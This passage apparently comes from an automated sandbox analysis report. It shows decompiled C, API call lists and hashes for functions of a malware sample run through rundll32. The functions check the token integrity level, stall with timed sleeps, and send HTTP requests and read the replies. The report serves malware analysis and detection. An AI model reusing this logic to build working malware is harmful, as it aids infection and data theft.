                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04A48E2F
                                • _snwprintf.NTDLL ref: 04A48E54
                                • CreateFileMappingW.KERNELBASE(000000FF,04A4D2AC,00000004,00000000,00001000,?), ref: 04A48E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53), ref: 04A48E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04A48E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?), ref: 04A48EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53), ref: 04A48EC2
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 812020cb060f22cd990103fd8681214f480efd03e3254c0b5c70ae97e7802ee0
                                • Instruction ID: 0ddea845bb0132f6a9d980251ba7ee6bf808f27c0b2872fcd1a7b4752ca1be54
                                • Opcode Fuzzy Hash: 812020cb060f22cd990103fd8681214f480efd03e3254c0b5c70ae97e7802ee0
                                • Instruction Fuzzy Hash: 4921C0BAA41204BBE711FFA4DC06F8E77B9EBD4720F110124F609EA280E675EA058B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A458DB, Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E04A458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04A429C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04A48B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04A48B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04A48B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04A48B22(_t46);
				}
				return _t24;
			}












                                0x04a458db
                                0x04a458db
                                0x04a458dd
                                0x04a458df
                                0x04a458e6
                                0x04a458ed
                                0x04a458ed
                                0x04a458f2
                                0x04a458f5
                                0x04a458fc
                                0x04a45905
                                0x04a45909
                                0x04a4590e
                                0x04a4590e
                                0x04a45910
                                0x04a45915
                                0x04a45919
                                0x04a4591e
                                0x04a4591e
                                0x04a45920
                                0x04a45925
                                0x04a45929
                                0x04a4592e
                                0x04a4592e
                                0x04a45930
                                0x04a4593b
                                0x04a4593e
                                0x04a4593e
                                0x04a45940
                                0x04a45945
                                0x04a45948
                                0x04a45948
                                0x04a4594a
                                0x04a45951
                                0x04a45954
                                0x04a45959
                                0x04a4595c
                                0x04a4595c
                                0x04a4595f
                                0x04a45964
                                0x04a45967
                                0x04a45967
                                0x04a4596c
                                0x04a45970
                                0x04a45973
                                0x04a45973
                                0x04a45978
                                0x04a4597d
                                0x00000000
                                0x04a45980
                                0x04a45987

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45909
                                • InternetCloseHandle.WININET(?), ref: 04A4590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45919
                                • InternetCloseHandle.WININET(?), ref: 04A4591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45929
                                • InternetCloseHandle.WININET(?), ref: 04A4592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A493DC,?,?,00000000,00000000,74E481D0), ref: 04A4593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A493DC,?,?,00000000,00000000,74E481D0), ref: 04A45948
                                  • Part of subcall function 04A429C0: WaitForMultipleObjects.KERNEL32(00000002,04A4A923,00000000,04A4A923,?,?,?,04A4A923,0000EA60), ref: 04A429DB
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: 00b71729bf7b88784300b1944da1edc16d3342fce6ff8ae2ef4201c3335307c0
                                • Instruction ID: bbb19a45dabda2431ed00edadaece27d10150c0f2d236812d2b5315e3826a54f
                                • Opcode Fuzzy Hash: 00b71729bf7b88784300b1944da1edc16d3342fce6ff8ae2ef4201c3335307c0
                                • Instruction Fuzzy Hash: A811F97AA00648BBC630AFEAEC84C1FB7E9FFD53243950D1DE186D3511C725F8498A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4A2C6, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E04A4A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4a4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04A41525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04A48B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x04a4a2d3
                                0x04a4a2da
                                0x04a4a2e1
                                0x04a4a2f5
                                0x04a4a300
                                0x04a4a318
                                0x04a4a325
                                0x04a4a328
                                0x04a4a32d
                                0x04a4a338
                                0x04a4a33c
                                0x04a4a34b
                                0x04a4a34f
                                0x04a4a36b
                                0x04a4a36b
                                0x04a4a36f
                                0x04a4a36f
                                0x04a4a374
                                0x04a4a378
                                0x04a4a37e
                                0x04a4a37f
                                0x04a4a386
                                0x04a4a38c

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04A4A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04A4A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04A4A328
                                • CloseHandle.KERNEL32(00000000), ref: 04A4A378
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04A4A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04A4A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04A4A363
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 1e7c48cb6622b6c57fdd158453800cbeae8cd15f7b275d67afa9ec7cd943bbf5
                                • Instruction ID: 007de177dc4f03005e38b1d4d5a52656873cc1ed7174ef4f2f8b4ebb565a7561
                                • Opcode Fuzzy Hash: 1e7c48cb6622b6c57fdd158453800cbeae8cd15f7b275d67afa9ec7cd943bbf5
                                • Instruction Fuzzy Hash: 5C213A7990020CFFEB109FA4DC44EEEBBB9EBC8304F1040A5E511A6290D775AE45EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45988, Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 223 4a45988-4a4598f 224 4a45991-4a45998 call 4a457dd 223->224 225 4a4599a-4a4a574 ResetEvent InternetReadFile 223->225 224->225 231 4a459a2-4a459a3 224->231 229 4a4a5a5-4a4a5aa 225->229 230 4a4a576-4a4a584 GetLastError 225->230 234 4a4a5b0-4a4a5bf 229->234 235 4a4a66d 229->235 232 4a4a586-4a4a594 call 4a429c0 230->232 233 4a4a59d-4a4a59f 230->233 237 4a4a670-4a4a676 232->237 242 4a4a59a 232->242 233->229 233->237 240 4a4a5c5-4a4a5d4 call 4a41525 234->240 241 4a4a668-4a4a66b 234->241 235->237 245 4a4a65a-4a4a65c 240->245 246 4a4a5da-4a4a5e2 240->246 241->237 242->233 248 4a4a65d-4a4a666 245->248 247 4a4a5e3-4a4a608 ResetEvent InternetReadFile 246->247 251 4a4a631-4a4a636 247->251 252 4a4a60a-4a4a618 GetLastError 247->252 248->237 253 4a4a641-4a4a64b call 4a48b22 251->253 255 4a4a638-4a4a63f 251->255 252->253 254 4a4a61a-4a4a628 call 4a429c0 252->254 253->248 260 4a4a64d-4a4a658 call 4a448cb 253->260 254->253 261 4a4a62a-4a4a62f 254->261 255->247 260->248 261->251 261->253
                                C-Code - Quality: 71%
                                			E04A45988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				int _t34;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
					if(_t34 != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x4a4d164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04A41525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04A429C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04A48B22(_v16);
										if(_t64 == 0) {
											_t64 = E04A448CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04A429C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04A457DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                0x04a45988
                                0x04a45989
                                0x04a4598f
                                0x04a4599a
                                0x04a4599a
                                0x04a4599c
                                0x04a4a556
                                0x04a4a55b
                                0x04a4a55d
                                0x04a4a56c
                                0x04a4a574
                                0x04a4a5a5
                                0x04a4a5aa
                                0x04a4a66d
                                0x04a4a5b0
                                0x04a4a5b7
                                0x04a4a5bf
                                0x04a4a66a
                                0x04a4a5c5
                                0x04a4a5ca
                                0x04a4a5cf
                                0x04a4a5d4
                                0x04a4a65c
                                0x04a4a5da
                                0x04a4a5da
                                0x04a4a5dc
                                0x04a4a5e2
                                0x04a4a5e3
                                0x04a4a5e3
                                0x04a4a5e6
                                0x04a4a5e9
                                0x04a4a5ef
                                0x04a4a600
                                0x04a4a608
                                0x00000000
                                0x00000000
                                0x04a4a610
                                0x04a4a618
                                0x04a4a624
                                0x04a4a628
                                0x04a4a62a
                                0x04a4a62f
                                0x00000000
                                0x00000000
                                0x04a4a62f
                                0x04a4a628
                                0x04a4a641
                                0x04a4a644
                                0x04a4a64b
                                0x04a4a656
                                0x04a4a656
                                0x00000000
                                0x04a4a631
                                0x04a4a631
                                0x04a4a636
                                0x04a4a638
                                0x04a4a639
                                0x04a4a63c
                                0x00000000
                                0x04a4a63c
                                0x00000000
                                0x04a4a636
                                0x04a4a5e3
                                0x04a4a65d
                                0x04a4a65d
                                0x04a4a663
                                0x04a4a663
                                0x04a4a5bf
                                0x04a4a576
                                0x04a4a57c
                                0x04a4a584
                                0x04a4a59d
                                0x04a4a59f
                                0x00000000
                                0x00000000
                                0x04a4a586
                                0x04a4a590
                                0x04a4a594
                                0x04a4a59a
                                0x00000000
                                0x04a4a59a
                                0x04a4a594
                                0x04a4a584
                                0x04a4a676
                                0x04a45991
                                0x04a45991
                                0x04a45998
                                0x04a459a3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a45998

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04A4A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 04A4A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04A4A576
                                • ResetEvent.KERNEL32(?), ref: 04A4A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 04A4A600
                                • GetLastError.KERNEL32 ref: 04A4A60A
                                  • Part of subcall function 04A457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04A457F4
                                  • Part of subcall function 04A457DD: SetEvent.KERNEL32(?), ref: 04A45804
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A45836
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4585B
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4587B
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 211164b52f50e2377eac241b182bea0ae85425f9e1e7b93b3c378d27fbfcc0d4
                                • Instruction ID: 0c6371c0ccac2a8f01b127c982baf47a4f45a698108c95b33acaf3c2d1557a8e
                                • Opcode Fuzzy Hash: 211164b52f50e2377eac241b182bea0ae85425f9e1e7b93b3c378d27fbfcc0d4
                                • Instruction Fuzzy Hash: 7641E236A40600EFEB219FA5DD44FAEB3B9EFC8360F210528E556D7190EB70F9429B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A42789, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04A42789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4a4d238 = _t10;
				if(_t10 != 0) {
					 *0x4a4d1a8 = GetTickCount();
					_t12 = E04A49EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L04A4B0CA();
							_t34 = _t14 + _t16;
							_t18 = E04A4122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E04A44D4D(_t26) != 0) {
							 *0x4a4d260 = 1; // executed
						}
						_t12 = E04A42F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                0x04a42789
                                0x04a4278f
                                0x04a42790
                                0x04a4279c
                                0x04a427a2
                                0x04a427a9
                                0x04a427b9
                                0x04a427be
                                0x04a427c5
                                0x04a427c7
                                0x04a427cc
                                0x04a427d2
                                0x04a427d8
                                0x04a427e2
                                0x04a427e6
                                0x04a427e8
                                0x04a427ed
                                0x04a427ee
                                0x04a427ef
                                0x04a427f4
                                0x04a427fa
                                0x04a42805
                                0x04a42806
                                0x04a4280c
                                0x04a42812
                                0x04a4281e
                                0x04a42820
                                0x04a42820
                                0x04a4282a
                                0x04a4282a
                                0x04a427ab
                                0x04a427ad
                                0x04a427ad
                                0x04a42834

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4279C
                                • GetTickCount.KERNEL32 ref: 04A427B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04A47F25,?), ref: 04A427CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A427D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04A427EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4280C
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 99b55e8ed6a00dd724347387aa79d26402510c3fcd9b40a6ca920c77f130d940
                                • Instruction ID: 86c16eb059fca4620082cb3211a1c3113ae4d433fd29161eebf1e995f1fedb4b
                                • Opcode Fuzzy Hash: 99b55e8ed6a00dd724347387aa79d26402510c3fcd9b40a6ca920c77f130d940
                                • Instruction Fuzzy Hash: CF11C276A40200ABF310ABB4DC19B5E36A8DBD43A5F004129F909CB280FAB9ED418660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A497F7, Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 279 4a497f7-4a49806 280 4a49808-4a49818 call 4a48cfa 279->280 281 4a4981a-4a49825 call 4a4a85c 279->281 280->281 286 4a49869 GetLastError 280->286 287 4a49864-4a49867 281->287 288 4a49827-4a4984c ResetEvent * 2 HttpSendRequestA 281->288 289 4a4986b-4a4986d 286->289 287->286 287->289 290 4a4984e-4a49855 GetLastError 288->290 291 4a49859-4a4985c SetEvent 288->291 290->287 293 4a49857 290->293 292 4a49862 291->292 292->287 293->292
                                C-Code - Quality: 100%
                                			E04A497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				int _t14;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04A48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04A4A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_t14 = HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0); // executed
					if(_t14 != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}








                                0x04a497f7
                                0x04a49804
                                0x04a49806
                                0x04a49869
                                0x00000000
                                0x04a49869
                                0x04a4981e
                                0x04a49825
                                0x04a49831
                                0x04a49836
                                0x04a49843
                                0x04a4984c
                                0x04a4985c
                                0x00000000
                                0x04a4984e
                                0x04a4984e
                                0x04a49855
                                0x04a49862
                                0x04a49862
                                0x04a49862
                                0x04a49855
                                0x04a4984c
                                0x04a49867
                                0x00000000
                                0x00000000
                                0x04a4986d

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A49831
                                • ResetEvent.KERNEL32(?), ref: 04A49836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04A49843
                                • GetLastError.KERNEL32 ref: 04A4984E
                                • GetLastError.KERNEL32(?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A49869
                                  • Part of subcall function 04A48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000), ref: 04A48D06
                                  • Part of subcall function 04A48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102,04A4937B,?), ref: 04A48D64
                                  • Part of subcall function 04A48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D74
                                • SetEvent.KERNEL32(?), ref: 04A4985C
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 4257d7b54fa11a2a131a1747a2222c577b419c62023e2a32183114a90d2779e2
                                • Instruction ID: 7f85803bc1f12ec8bcf4b2e42e612b3e62292f27086639717ca7d239432be673
                                • Opcode Fuzzy Hash: 4257d7b54fa11a2a131a1747a2222c577b419c62023e2a32183114a90d2779e2
                                • Instruction Fuzzy Hash: 46018B71101200AAEB306F3ADC44F1FB6ACEFD4338F110A28E551910E0D722EC259E60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A41128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 4a41128-4a41137 RtlEnterCriticalSection 295 4a41141-4a4114b 294->295 296 4a4114d-4a41151 295->296 297 4a41139-4a4113b Sleep 295->297 298 4a41153-4a41158 296->298 299 4a41169-4a4116e call 4a44a2a 296->299 297->295 298->299 300 4a4115a-4a4115d 298->300 302 4a41173-4a41185 RtlLeaveCriticalSection 299->302 300->299
                                C-Code - Quality: 50%
                                			E04A41128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4a4d32c; // 0x4e595b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4a4d32c; // 0x4e595b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4a4d030) {
					HeapFree( *0x4a4d238, 0, _t8);
				}
				_t9 = E04A44A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4a4d32c; // 0x4e595b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                0x04a41128
                                0x04a41128
                                0x04a41131
                                0x04a41141
                                0x04a41141
                                0x04a41146
                                0x04a4114b
                                0x00000000
                                0x00000000
                                0x04a4113b
                                0x04a4113b
                                0x04a4114d
                                0x04a41151
                                0x04a41163
                                0x04a41163
                                0x04a4116e
                                0x04a41173
                                0x04a41176
                                0x04a4117b
                                0x04a4117f
                                0x04a41185

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A41131
                                • Sleep.KERNEL32(0000000A,?,04A430F3), ref: 04A4113B
                                • HeapFree.KERNEL32(00000000,00000000,?,04A430F3), ref: 04A41163
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A4117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
